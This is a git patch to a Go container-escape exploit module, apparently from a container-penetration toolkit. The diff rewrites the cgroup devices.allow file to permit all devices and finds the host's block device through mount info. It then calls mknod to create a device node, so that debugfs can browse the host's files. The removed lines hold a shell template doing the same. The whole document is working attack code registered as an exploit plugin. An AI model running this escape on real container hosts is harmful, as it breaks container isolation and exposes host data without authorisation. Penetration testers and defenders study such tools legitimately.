From e1a31ad5a3204d9b861d08115948b1845a7f77f8 Mon Sep 17 00:00:00 2001 From: neargle Date: Fri, 29 Jan 2021 08:39:27 +0800 Subject: [PATCH] update rewrite and mknod function more elegant by yeahx --- pkg/exploit/rewrite_cgroup_devices.go | 57 ++++++++++++--------------- 1 file changed, 26 insertions(+), 31 deletions(-) diff --git a/pkg/exploit/rewrite_cgroup_devices.go b/pkg/exploit/rewrite_cgroup_devices.go index 3b72627..ca06df2 100644 --- a/pkg/exploit/rewrite_cgroup_devices.go +++ b/pkg/exploit/rewrite_cgroup_devices.go @@ -8,8 +8,6 @@ import ( "log" "os" "path/filepath" - "regexp" - "strings" "syscall" ) @@ -31,13 +29,6 @@ func fileInode(path string) (inodeID uint64, err error) { return 0, nil } -func generateCreateMknodCmd(allowPath string, deviceID string) (string) { - shell := CreateMknodCmd - shell = strings.Replace(shell, "${DevicesAllowPath}", allowPath, -1) - shell = strings.Replace(shell, "${DeviceID}", deviceID, -1) - return shell -} - // runShellFile run shell script use bash func runShellFile(filePreString string, shell string) error { @@ -99,31 +90,42 @@ func (p cgroupDevicesExploitS) Run() bool { log.Printf("find cgroup devices.allow file: %s\n", devicesAllowPath) // get "virtblk" device ID - data, err := ioutil.ReadFile(procDeviceConfig) + mountInfos, err := util.GetMountInfo() if err != nil { - log.Printf("err found while open %s: %v\n", procDeviceConfig, err) - return false - } - r := regexp.MustCompile(`(\d+) virtblk`) - ret := r.FindStringSubmatch(string(data)) - if len(ret) < 2 { + log.Printf("get mount info error: %v", err) return false } - did := ret[1] - log.Printf("get virtblk device ID: %s\n", did) // rewrite and mknod - shell := generateCreateMknodCmd(devicesAllowPath, did) - err = runShellFile("device-mknod", shell) + err = util.SetBlockAccessible(devicesAllowPath) if err != nil { - log.Printf("run /tmp/device-mknod-* error: %s\n", err) + log.Printf("set block accessible err %v", err) return false } - // escape done~ - log.Println("now, run 'debugfs cdk_mknod_result' to browse host files.") + // use lxcfs_rw exp function by https://github.com/yeahx + for _, mi := range mountInfos { + if util.FindTargetDeviceID(&mi) { + + dev := util.MakeDev(mi.Marjor, mi.Minor) + if dev == 0 { + log.Printf("Blockdevice Marjor/Minor number invalid.") + return false + } + + err = syscall.Mknod("./cdk_mknod_result", syscall.S_IFBLK|uint32(os.FileMode(0700)), dev) + if err != nil { + log.Printf("mknod err: %v", err) + return false + } else { + // escape done~ + log.Println("now, run 'debugfs cdk_mknod_result' to browse host files.") + return true + } + } + } - return true + return false } // MountCgroupCmd remount a write-able devices cgroup subsystem @@ -132,13 +134,6 @@ mount -oremount,rw /sys/fs/cgroup mkdir /sys/fs/cgroup/cgneartest mount -t cgroup -o devices devices /sys/fs/cgroup/cgneartest` -var CreateMknodCmd = `set -uex -echo a > ${DevicesAllowPath} -sleep 2 -mknod cdk_mknod_result b ${DeviceID} 1` - -var procDeviceConfig = `/proc/devices` - func init() { exploit := cgroupDevicesExploitS{} plugin.RegisterExploit("rewrite-cgroup-devices", exploit)